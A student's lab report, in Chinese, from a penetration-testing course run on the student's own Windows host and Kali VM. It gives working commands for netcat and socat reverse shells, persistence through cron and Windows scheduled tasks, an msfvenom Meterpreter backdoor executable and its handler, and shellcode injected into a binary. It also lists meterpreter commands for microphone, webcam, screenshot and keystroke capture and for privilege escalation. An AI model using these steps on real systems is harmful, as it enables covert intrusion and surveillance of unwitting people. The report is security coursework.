1.实验内容
本次实验主要围绕渗透测试与远程执行控制展开,通过不同工具和技术手段实现了对目标主机的深入渗透与监控。实验内容可以概括为以下几个方面:
1.远程Shell获取:实验首先通过netcat和cron定时任务,以及socat与Windows任务计划相结合的方式,实现了对目标主机的远程Shell访问。这两种方法分别利用了Linux和Windows系统下的计划任务功能,自动执行反向Shell连接命令,从而绕过常规的安全限制,成功获取目标主机的操作权限。
2.可执行文件传输与执行:接下来,实验利用Metasploit Framework(MSF)的meterpreter或其他类似软件生成恶意可执行文件,并通过ncat或socat等工具将这些文件传送到目标主机并执行。这一步骤展示了如何通过网络传输恶意代码,并在目标机器上执行以进一步扩展攻击范围。
3.高级信息收集与权限提升:在成功获取Shell后,实验进一步利用MSF的meterpreter或其他工具收集目标主机的敏感信息,包括音频、摄像头数据、击键记录等。此外,还尝试了权限提升操作,以获取更高的系统权限,从而能够访问更多受保护的资源。
4.Shellcode注入与反弹Shell:作为实验的加分内容,实验还探索了Shellcode注入技术。通过MSF生成针对特定漏洞(如实验中的pwn1)的Shellcode,并成功将其注入到目标程序中,实现了无需用户交互即可自动建立反弹连接的Shell。这一步骤不仅展示了Shellcode注入的强大能力,还体现了对目标系统深层次漏洞利用的重要性。
2.实验过程
1.使用netcat获取主机操作Shell,cron启动某项任务
(1)查看主机的ip
首先关闭主机和虚拟机的防火墙,在windows主机上下载ncat程序,并打开cmd,输入ipconfig指令查看主机的IP地址:
(2)使用netcat进行连接并获取shell
虚拟机登入root用户(后续操作需要使用root权限),主机cmd进入ncat所在目录。
Win主机输入指令:ncat.exe -l -p 8888(l表示listen,“监听”;p表示port,指定端口,端口号可自行指定)
Linux虚机输入指令:nc 172.16.178.62 8888 -e /bin/sh(nc即netcat,后面的参数是要连接的ip和port,-e是指定连接后运行的程序,本例中就是shell。)
(3)通过设置cron使得kali启动定时任务。
cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程。注意:windows不能直接使用crontab -e远程编辑,会报错;
我们这里进入虚拟机的虚拟机的root账户,输入crontab -e (执行文字编辑器来设定时程表),选择的是2:/usr/bin/vim.basic;
输入后进入文字编辑器,输入指令30 * * * * /bin/netcat 172.16.178.62 8888 -e /bin/sh (输入自己主机的IP地址,在每小时的第30分钟启动任务)
编辑好后退出文字编辑器,输入crontab -l查看时程表:
同时在Linux主机中的/var/spool/cron/crontabs文件中会出现一个root文件。
现在回到Windows主机的cmd中进行操作,还是一样与Linux建立连接之后,切换到root模式,输入:
echo "* * * * * echo "20222407" > /home/lty20222407/2407.txt" > /var/spool/cron/crontabs/root(每分钟定时执行一次,用“20222407”覆盖文件lty20222407.txt)
crontab -l (检查时程表)
2. 使用socat获取主机操作Shell,任务计划启动
Socat与netcat类似,但比起netcat,socat功能更多,比如如建立ssl连接。
windows主机:下载socat,cmd进入socat文件夹,输入命令:
socat.exe tcp-listen:8888 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口8888,并把cmd.exe的stderr重定向到stdout)
Linux虚拟机:进入root用户,输入命令:
socat - tcp:172.16.178.62:8888
回到主机,我们需要事先准备一个程序以供运行,在此省略程序编写环节
在Linux上启用Windows的程序,通过命令行创建任务计划,在shell里输入命令:
schtasks /create /sc minute /mo 1 /tn "20222407lty" /tn C:\Users\86155\Desktop\wlgf2.exe(每一分钟执行一次我写的这个程序:)
回到windows主机,打开计算机管理,看到正在运行的任务名“20222407lty”,说明实验成功。
3.在Linux下使用MSF meterpreter生成可执行文件,利用ncat或socat传送到Windows主机并运行获取主机shell
保证windows的实时保护处于关闭状态,同时关闭防火墙进行实验。
(1)生成后门文件
首先在kali中输入ifconfig,获得虚拟机的IP地址:
虚拟机的IP地址是192.168.28.255
继续中输入以下命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.255 LPORT=8888 -f exe > 2407backdoor.exe(使用msfvenom 工具生成一个反向 TCP Meterpreter shell 的 payload,并将其保存到一个可执行文件中。)
LHOST=192.168.28.255是shell 连接的主机 IP 地址,在本实验中是虚拟机的IP地址;
LPORT=8888是攻击者的系统上监听的端口号;
-f exe指定了生成的 payload 的格式,这里是exe;
2407backdoor.exe即生成的恶意可执行文件(名称自拟)
(2)将后门文件传输至目标主机
主机进入ncat所在目录下,输入指令:
ncat.exe -lv 8888 > "C:\Users\86155\Desktop\2301backdoor.exe"(监听8888窗口等待接收可执行文件2407backdoor.exe,并将2407backdoor.exe文件存放在桌面上)
虚拟机上输入指令:
nc 192.168.28.255 8888 < 2407backdoor.exe(将生成的后门文件2407backdoor.exe传给主机)
3)配置监听模块
回到虚拟机,在Kali终端输入命令msfconsole,然后对监听模块进行配置:
use exploit/multi/handler(使用监听模块,设置payload)
set payload windows/meterpreter/reverse_tcp (使用和生成后门程序时相同的payload)
set LHOST 192.168.1.106 (攻击机的IP地址,和生成后门程序时指定的IP相同)(更换网络,导致ip改变)
set LPORT 8888(监听的端口)
接着输入exploit,使监听模块开始运行,并在Windows终端运行后门2407backdoor.exe文件
返回检查虚拟机,输入ls查看windows主机目录,确认已经连接。
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(1)获取目标主机音频、截屏、摄像头、键盘记录
在exploit模块中继续输入以下命令:
record_mic (音频)
screenshot (截屏)
webcam_snap (拍照)
keyscan_start (开始读取键盘记录)
keyscan_dump (读取键盘记录结束)
音频截屏和拍照被保存在root文档中,键盘记录的字符串将直接显示在命令栏上
(2)提权
确保windows的cmd指令是使用管理员身份运行的,继续在exploit模块中继续输入:
getuid (查看当前用户)
getsystem (提权指令)
5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
在kali命令行下输入:
Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.28.255 LPORT=8888 -x /kali/Desktop/pwn1 -f elf >pwn1
(使用了msfvenom 工具生成一个 Meterpreter 反向 TCP shell的 payload,并将其注入到指定的可执行文件中,然后将结果输出到一个名为 pwn1的文件中。)
-p linux/x86/meterpreter/reverse_tcp:指定要生成的 payload 类型。
LHOST=192.168.28.255:目标主机 IP 地址为 192.168.28.255,这里即虚拟机IP地址。
LPORT=8888:设置 Meterpreter shell 使用的本地端口号为 8888。
-x /home/kali/Document/pwn1:指定一个可执行文件作为模板,生成的 payload 将会注入到该文件中。
-f elf:指定输出文件的格式为 ELF 格式,适用于 Linux 系统的可执行文件格式。
对生成的pwn1文件赋予权限:
输入指令msfconsole,重现监听过程:
打开另一个shell,运行生成的2301_pwn文件(需要使用root权限)
回到第一个shell,输入ls确认连接,成功实现远程控制shell
3.问题及解决方案
问题1:crontab 在root模式下无法使用
解决方案:在向老师询问后发现,此电脑的crontab 无法在root模式下运行,需要在用户名模式下运行。
4.学习感悟、思考等
在对实验一进行深入探索后,我原本期望实验二能够聚焦于工具的应用,以熟悉和掌握这些工具,并且预期其复杂度相对较低。然而,实际操作过程中,却遭遇了诸多意想不到的挑战,这让我深刻地体会到独立研究与依赖既有报告指导之间存在着显著的难度差异。在这个过程中,我不但需要自主地搜集并整合大量的资料,还必须对每一个细节进行深入的剖析和学习,以便应对层出不穷的技术难题。 值得特别关注的是,由于主机配置存在差异,即使严格遵循正确的操作流程,也可能会遇到意想不到的报错问题。比如,在第三项实践活动中,我精心构建的 MSF meterpreter 后门文件在 Windows 主机上出现了“此应用无法在你的电脑上运行”的错误提示。这种步骤正确但结果却与之相悖的现象,极大地考验了我的问题诊断和解决能力,同时也让我深切感受到技术实践中的不确定性和复杂性。 尽管面临重重困难,但通过坚持不懈的努力和探索,我逐渐对 netcat、socat、cron 以及 MSF meterpreter 等关键工具建立了全面的认识和理解。在这个过程中,虽然遭遇了不少“坑洼”,但正是这些挑战和困境,促使我不断超越自我,积累了宝贵的实践经验和知识财富。更为重要的是,此次实验让我深刻认识到,在缺乏有效安全防护措施的环境下,隐私泄露和权限窃取的风险是巨大的,从而进一步增强了我的网络安全防护意识和责任感。
